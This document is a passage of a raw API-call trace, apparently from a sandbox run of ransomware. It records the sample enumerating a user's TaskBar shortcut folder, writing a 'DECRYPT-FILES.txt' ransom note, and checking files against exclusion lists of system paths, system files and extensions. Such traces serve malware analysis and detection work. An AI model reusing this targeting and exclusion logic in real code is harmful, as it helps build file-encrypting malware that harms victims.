[0077.847] CloseHandle (hObject=0x0) returned 0 [0077.847] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.848] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0077.848] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0077.848] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0077.848] lstrcatW (in: lpString1="TaskBar", lpString2="\\" | out: lpString1="TaskBar\\") returned="TaskBar\\" [0077.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Program Files") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch=":\\Windows") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Games\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\All Users") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="AhnLab") returned 0x0 [0077.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0077.848] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.848] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\jkbimi8.tmp") returned 119 [0077.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.849] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0077.849] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.849] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt") returned 125 [0077.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.850] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.851] CloseHandle (hObject=0x464) returned 1 [0077.852] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0077.852] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0077.852] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.852] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.852] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.852] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.852] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc4b320, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.852] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0077.852] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0077.852] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0077.852] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0077.852] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e02c640, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e02c640, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df47e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="autorun.inf") returned 1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot.ini") returned 1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="desktop.ini") returned 1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0077.852] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="iconcache.db") returned -1 [0077.853] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootsect.bak") returned 1 [0077.853] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat.log") returned -1 [0077.853] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="thumbs.db") returned -1 [0077.853] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Bootfont.bin") returned 1 [0077.853] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0077.853] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.853] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc251c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc251c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="autorun.inf") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="boot.ini") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="desktop.ini") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="ntuser.dat") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="iconcache.db") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="bootsect.bak") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="ntuser.dat.log") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="thumbs.db") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Bootfont.bin") returned 1 [0077.853] lstrlenW (lpString="Internet Explorer (2).lnk") returned 25 [0077.853] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.853] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0077.853] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0077.853] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0077.853] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.853] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.853] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.853] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.853] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.853] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.854] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.854] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.854] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.854] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.854] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.854] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.854] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0077.854] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.854] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0077.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp" [0077.854] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.854] CloseHandle (hObject=0x0) returned 0 [0077.854] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.855] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0de7e00, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x491, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="autorun.inf") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="desktop.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat") returned -1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="iconcache.db") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootsect.bak") returned 1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat.log") returned -1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="thumbs.db") returned -1 [0077.855] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Bootfont.bin") returned 1 [0077.855] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0077.855] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.855] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="autorun.inf") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="boot.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="desktop.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="ntuser.dat") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="iconcache.db") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="bootsect.bak") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="ntuser.dat.log") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="thumbs.db") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Bootfont.bin") returned 1 [0077.855] lstrlenW (lpString="Windows Explorer (2).lnk") returned 24 [0077.855] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.855] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0077.855] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0077.856] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0077.856] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.856] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="autorun.inf") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="boot.ini") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="desktop.ini") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="ntuser.dat") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="iconcache.db") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="bootsect.bak") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="ntuser.dat.log") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="thumbs.db") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Bootfont.bin") returned 1 [0077.856] lstrlenW (lpString="Windows Media Player (2).lnk") returned 28 [0077.856] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.856] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="autorun.inf") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="boot.ini") returned 1 [0077.856] lstrcmpiW 